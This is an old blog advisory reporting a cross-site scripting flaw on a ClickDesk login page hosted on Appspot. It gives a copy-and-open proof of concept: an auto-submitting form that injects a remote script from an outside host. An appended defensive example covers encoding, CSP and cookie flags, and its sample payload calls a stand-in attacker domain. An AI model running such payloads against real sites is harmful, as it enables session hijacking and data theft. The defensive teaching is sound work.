Cross Site Scripting Vulnerability at Google Appspot

Saturday, August 20, 2011 // by Hacking Beast Editor




The Google Appspot "ClickDesk" login page is vulnerable to a cross-site scripting (XSS) attack. Cross-site scripting is a critical issue in web applications. When an attacker gets a user's browser to execute his or her XSS code, that code runs within the security context (or zone) of the hosting web site. With this level of privilege, the code can read (keylogging), modify and transmit any sensitive data accessible to the browser. A cross-site-scripted user could have his or her account hijacked (cookie theft), be redirected to another location, or be shown fraudulent content apparently delivered by the web site they are visiting.

The vulnerability can easily be amplified with publicly available tools such as the Cross Site Scripting Framework (XSSF), the Perl-based XSS-Harvest, and so on.
Proof of concept:
The following proof-of-concept sample performs an HTTP POST that triggers the XSS vulnerability, using a script source taken from the "XSS cheat sheet" at ha.ckers.org. In a real attack, the injection source URL would be hosted on some compromised web server.

Copy the following code and save it under any .htm or .html filename. Opening it in any browser triggers it automatically.
*********

<script>
document.body.innerHTML += '<form id="a" action="https://contactuswidget.appspot.com/login.jsp?domain=lc" method="post"><input type="hidden" name="command" value="login"><input type="hidden" id="username" name="username" value="<script src=http:\/\/ha.ckers.org\/xss.jpg><\/script>"><input type="hidden" id="password" name="password" value="aaaa"></form>';
document.getElementById("a").submit();
</script>
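As an added illustration (not part of the original post, and not ClickDesk's own code), here is the server-side pattern behind this class of bug and its fix, modelled in Node-style JavaScript: a login page that echoes the submitted username straight into its HTML, the same page with entity encoding, and the response headers that blunt the remote-script and cookie-theft consequences described above. Function names, headers and the sample input are constructed for the example.

```javascript
// Added example, not from the original post: a model of the bug class behind the
// advisory (a login page reflecting the submitted "username" unencoded) and its fix.
// Function names and the sample input are constructed for illustration.

// Vulnerable pattern: the untrusted value is concatenated straight into the markup,
// so a value containing a quote and a tag breaks out of the attribute.
function renderLoginVulnerable(username) {
  return '<form method="post"><input name="username" value="' + username + '">' +
         '<input name="password" type="password"></form>';
}

// Entity-encode the five characters that can change meaning in HTML text or
// double-quoted attribute context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened pattern: the same template, but every untrusted value is encoded
// for the context it lands in before concatenation.
function renderLoginSafe(username) {
  return '<form method="post"><input name="username" value="' + escapeHtml(username) + '">' +
         '<input name="password" type="password"></form>';
}

// Defence in depth for the consequences the post describes: a CSP that refuses
// scripts from other origins, and a session cookie JavaScript cannot read.
// The cookie value is a placeholder, not a real session id.
function hardenedHeaders() {
  return {
    'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'",
    'Set-Cookie': 'JSESSIONID=<placeholder>; Secure; HttpOnly; SameSite=Lax',
  };
}

// Regression check: count opening tags in rendered output; a reflected value must
// never add one beyond those the template itself contains.
function countOpeningTags(html) {
  return (html.match(/<[a-z]/gi) || []).length;
}

// Run directly to see both renderings for a constructed attribute-breaking input.
if (typeof require !== 'undefined' && require.main === module) {
  const sample = '"><script src="//attacker.invalid/x.js"></script>';
  console.log(renderLoginVulnerable(sample));
  console.log(renderLoginSafe(sample));
}
```

The tag-count check is the kind of assertion a test suite can run against every reflected field: for the template above it must always return 3, whatever the input.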

